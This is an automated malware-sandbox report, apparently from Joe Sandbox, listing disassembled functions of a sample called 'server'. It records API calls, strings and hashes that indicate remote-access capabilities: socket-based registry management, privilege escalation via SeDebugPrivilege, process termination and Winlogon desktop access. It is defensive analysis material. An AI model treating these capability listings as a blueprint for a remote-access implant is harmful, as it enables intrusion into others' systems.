API String ID: 352835431-4270158488
Opcode ID: 1a3e656dce507ef5684df938aa75e947694e038f5f6d888d555c42b369e4d593
Instruction ID: 4358d16d81b6b97c962036346be1bb4ce46d92d5ac57d3850fb05990df2a4d70
Opcode Fuzzy Hash: 1a3e656dce507ef5684df938aa75e947694e038f5f6d888d555c42b369e4d593
Instruction Fuzzy Hash: C2112832900619ABDF228F94DD00ADFBBB5EB48394F108166FA11761A0D3368D60DF94

Function 10009EB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(s Loop_RegeditManager(SOCKET sRemote)), ref: 10009ED7

Part of subcall function 10003780: WSAStartup.WS2_32(00000202,?), ref: 100037ED
Part of subcall function 10003780: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB

Part of subcall function 10003940: ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
Part of subcall function 10003940: socket.WS2_32 ref: 10003966

OutputDebugStringA.KERNEL32(s !socketClient.Connect !=-1), ref: 10009F23

Part of subcall function 10003880: WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038DF
Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038E8
Part of subcall function 10003880: WSACleanup.WS2_32 ref: 100038EA

Strings

s Loop_RegeditManager(SOCKET sRemote), xrefs: 10009ED2
s !socketClient.Connect !=-1, xrefs: 10009F1E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseDebugEventHandleOutputString$CleanupCreateObjectResetSingleStartupWaitsocket
String ID: s !socketClient.Connect !=-1$s Loop_RegeditManager(SOCKET sRemote)
API String ID: 660129190-2143064718
Opcode ID: cf6971e579b135155909e727a0b979c8128c65cc8493ae3f99d5ed024adca8a6
Instruction ID: e6927e26891a02968b8d8c746bac23e7cdf3acfa35c335dd7adad3e8361e2961
Opcode Fuzzy Hash: cf6971e579b135155909e727a0b979c8128c65cc8493ae3f99d5ed024adca8a6
Instruction Fuzzy Hash: E1119EB50087819AE364DFA4D941B9BB798EF94760F008A0DE5A9632C5DF34290CCB73

Function 10011F00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97

OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 10011F33
TerminateProcess.KERNEL32(00000000,00000000), ref: 10011F3E
CloseHandle.KERNEL32(00000000), ref: 10011F45

Strings

SeDebugPrivilege, xrefs: 10011F08, 10011F59

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Process$Open$CloseCurrentHandleTerminateToken
String ID: SeDebugPrivilege
API String ID: 3822579153-2896544425
Opcode ID: 88327105c846fcc13900bef19591bfffc91d2265c3eb9a717cc263b54f5821ef
Instruction ID: 462bede0e6496ce79bcfb719127096f46805a777cb0c1315f10224566a174b47
Opcode Fuzzy Hash: 88327105c846fcc13900bef19591bfffc91d2265c3eb9a717cc263b54f5821ef
Instruction Fuzzy Hash: 21F0F4366003516BE228EB549C86FBF779AEFC0755F14042DFB415E241DBB4BC4682B2

Function 10012B10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10012B11
GetThreadDesktop.USER32(00000000), ref: 10012B18

Part of subcall function 10012AC0: OpenDesktopA.USER32(?,00000000,00000000,400001CF), ref: 10012AD3

PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 10012B44

Strings

Winlogon, xrefs: 10012B1E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: DesktopThread$CurrentMessageOpenPost
String ID: Winlogon
API String ID: 1322334875-744610081
Opcode ID: 396b67e399f582221f47aa72e7d8659033b76d44156f69e5a7280715aeba948b
Instruction ID: 8ff4991761b0dff3829612d51007d4e4f7b3ebdfccf44ddc9c980502df986e38
Opcode Fuzzy Hash: 396b67e399f582221f47aa72e7d8659033b76d44156f69e5a7280715aeba948b
Instruction Fuzzy Hash: EDE086B2A413A027F62167707C8AFEB22059F05740F054030FA029E181E7B4DEE251E2

Function 10011370 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,PeekNamedPipe), ref: 1001138A
GetProcAddress.KERNEL32(00000000), ref: 10011391

Strings

kernel32.dll, xrefs: 10011385
PeekNamedPipe, xrefs: 10011380

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: PeekNamedPipe$kernel32.dll
API String ID: 2574300362-3402591003
Opcode ID: 37be9f72f6ca300e1428dd39efc81c674823f9abed165e292987da6a783efa52
Instruction ID: 1234715f33eb3a59c65f095741a8430bc1c869571d7f7331aa22a25da0abe920
Opcode Fuzzy Hash: 37be9f72f6ca300e1428dd39efc81c674823f9abed165e292987da6a783efa52
Instruction Fuzzy Hash: B3C09B70401B74E7FB049BB04D4C7453665D6457013404701F791D5124C77855C1EF19

Function 10011470 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WaitForMultipleObjects), ref: 1001148A
GetProcAddress.KERNEL32(00000000), ref: 10011491

Strings

kernel32.dll, xrefs: 10011485
WaitForMultipleObjects, xrefs: 10011480

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: WaitForMultipleObjects$kernel32.dll
API String ID: 2574300362-425320575
Opcode ID: ff427f7aa768ca3a8ed3ff132f2c19765d7d1b01677b2b3afdfe7a8a9e40baff
Instruction ID: bb72085c76fc3cd786db20b2684e91290bb1d992f234a8e5dbf67af8a632e61f
Opcode Fuzzy Hash: ff427f7aa768ca3a8ed3ff132f2c19765d7d1b01677b2b3afdfe7a8a9e40baff
Instruction Fuzzy Hash: B7C09B71401BA4D7FB049BB04D8C6453665D6457153504601F78199120C77854C1E65E

Function 00401730 Relevance: 6.5, APIs: 5, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f273f069ea18d1aa5b4337fc6a977d5543074f6f7179b24e1d4bdb7c5cae4ea
Instruction ID: e05905e1c01977d2d0b956cff86eb2a38737ca1d4fd010b57140b871a74b783a
Opcode Fuzzy Hash: 2f273f069ea18d1aa5b4337fc6a977d5543074f6f7179b24e1d4bdb7c5cae4ea
Instruction Fuzzy Hash: 33716673A002107BDB227A268D40BAB3A699B417A4F15413BFC55BB2F1DB38DE41D2DC

Function 004026BF Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00402F62), ref: 004026E0
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00402F62), ref: 00402704
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00402F62), ref: 0040271E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00402F62), ref: 004027DF
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00402F62), ref: 004027F6

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 8f3c31f509a3233290b576d4393d2cb65234ee27b82ca2d76f99f18585f5a399
Instruction ID: a04098866118948378d325ab6d9eb96549c892597020e1ecc4c4a2e7dacd7581
Opcode Fuzzy Hash: 8f3c31f509a3233290b576d4393d2cb65234ee27b82ca2d76f99f18585f5a399
Instruction Fuzzy Hash: E831E274640705ABD330CF24ED89B26BBA0FB44B94F10453AE156A77D0E7B8A8459B8C

Function 100011B0 Relevance: 6.3, APIs: 5, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(76F90F00,?,00000000,76F90F00,00000000,10002605,00000000,?), ref: 100011CE
??2@YAPAXI@Z.MSVCRT(00000001), ref: 100011D8
strchr.MSVCRT ref: 100011FA
strchr.MSVCRT ref: 10001213
atoi.MSVCRT(00000001), ref: 10001220

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: strchr$??2@atoilstrlen
String ID:
API String ID: 3786266066-0
Opcode ID: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
Instruction ID: fbe44b17f1b507f99859eaa0b90b0c883dd8256749a52aba7323050170f11358
Opcode Fuzzy Hash: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
Instruction Fuzzy Hash: E501F5326003645FEB00DF699C847ABB7DAEFCA351F040069EA04DB301D7B16905CB62

Function 1000ECD0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED36

Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538

??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000ED88
??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED98
??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000EDF6

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@??3@$Open
String ID:
API String ID: 2374869923-0
Opcode ID: be878bee1e9da73a1a5f096cd974a78e79cbd151493b477e63510d5e1f51a3d3
Instruction ID: e9e04c6913910b47a72650e0984c01a22b61d2a3179dad928c464d9a0ff9bdc2
Opcode Fuzzy Hash: be878bee1e9da73a1a5f096cd974a78e79cbd151493b477e63510d5e1f51a3d3
Instruction Fuzzy Hash: 1731E2756046854FD308DE29CC91A6BB3DAEB88750F44492DF906E3385EB35ED09C792

Function 1000EB40 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EBA6

Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538

??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EBF8
??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EC08
??3@YAXPAX@Z.MSVCRT(?), ref: 1000EC62

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@??3@$Open
String ID:
API String ID: 2374869923-0
Opcode ID: 7532c89eedc79a481d8bda5d46ac26f2cc1cf5e389e941ce04d86380d7f123a9
Instruction ID: 32baaf49ce42a5a358fea7d510f57c92a2b0a776ecfe257346ecd251500ef787
Opcode Fuzzy Hash: 7532c89eedc79a481d8bda5d46ac26f2cc1cf5e389e941ce04d86380d7f123a9
Instruction Fuzzy Hash: B631D5766046845BE718DF28CC91A6BB3D6FBC8750F44492CF91693381EB36EE09C792

Function 1000EE30 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EE96

Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538

??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EEE8
??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EEF8
??3@YAXPAX@Z.MSVCRT(?), ref: 1000EF52

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@??3@$Open
String ID:
API String ID: 2374869923-0
Opcode ID: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
Instruction ID: 529d2750a5032d3fa2bb58871a274eaf41767a3587e5389a20a4cf427fd15475
Opcode Fuzzy Hash: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
Instruction Fuzzy Hash: 5331F5762046895BD308DE24C85166BB3D6FBC8750F44493CFA1693381DB36ED09C752

Function 100117E0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

LookupAccountSidA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000001,00000000), ref: 1001188D
LookupAccountSidA.ADVAPI32(00000000,?,00000008,00000000,?,00000001,00000000), ref: 100118D3
wsprintfA.USER32 ref: 10011901
740D24A0.WTSAPI32(?), ref: 10011917

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AccountLookup$wsprintf
String ID:
API String ID: 1244087393-0
Opcode ID: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
Instruction ID: 75ed8c1a40449dc84bd528c53c0faca8b09c11902cbaf50b3a4e55cf154f28bc
Opcode Fuzzy Hash: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
Instruction Fuzzy Hash: F5316D71208346AFE714CE55C8D4DABB3E9FBC8244F404E2DF68997240EA70ED498B62

Function 100034D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 100034DE
RtlLeaveCriticalSection.NTDLL(?), ref: 100034F4
memmove.MSVCRT(00000000,?,00000000,?,?,?,?,10003C99,?,00000005,00000005,00000000,?,?,?,?), ref: 10003545
RtlLeaveCriticalSection.NTDLL(?), ref: 1000356B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Entermemmove
String ID:
API String ID: 72348100-0
Opcode ID: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
Instruction ID: 41d1a370f2508b90d1dbac8cc85ef313bd04c1718ccfcefffe6925d1250f8bb9
Opcode Fuzzy Hash: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
Instruction Fuzzy Hash: 7D11B2363047149BEB05EF749C9946FBBDDEB45291700842DF90397356EE61ED088690

Function 1000E800 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

LocalSize.KERNEL32(00000000), ref: 1000E86E
LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E87A
LocalSize.KERNEL32(00000000), ref: 1000E895
LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E8A1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Local$FreeSize
String ID:
API String ID: 2726095061-0
Opcode ID: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
Instruction ID: 4cc34419d7a70d166c584db2d14c90f329438d3833b5948d6052ee62cb9623d3
Opcode Fuzzy Hash: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
Instruction Fuzzy Hash: 3711BE75105A909BF225EB14CC92BFFB39DEF85390F044A29F955A3288CF34AC05C7A2

Function 00401520 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00000000,00000000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401570
VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401597
GetProcessHeap.KERNEL32(00000000,00401127,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 004015A0
HeapFree.KERNEL32(00000000,?,00000000,0040171B,?), ref: 004015A7

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: Free$Heap$LibraryProcessVirtual
String ID:
API String ID: 548792435-0
Opcode ID: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
Instruction ID: 2d8dcf72d340e61f505ec02cbb84714f2cdd3d0f75e656bd935d2cd45be4ba94
Opcode Fuzzy Hash: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
Instruction Fuzzy Hash: 91113C71740701ABD720CB6ADC85F17B7E8AF88750F054929F55BEB2E0CB34E8418B58

Function 10003880 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationnetworkCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
CloseHandle.KERNEL32(?), ref: 100038DF
CloseHandle.KERNEL32(?), ref: 100038E8
WSACleanup.WS2_32 ref: 100038EA

Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
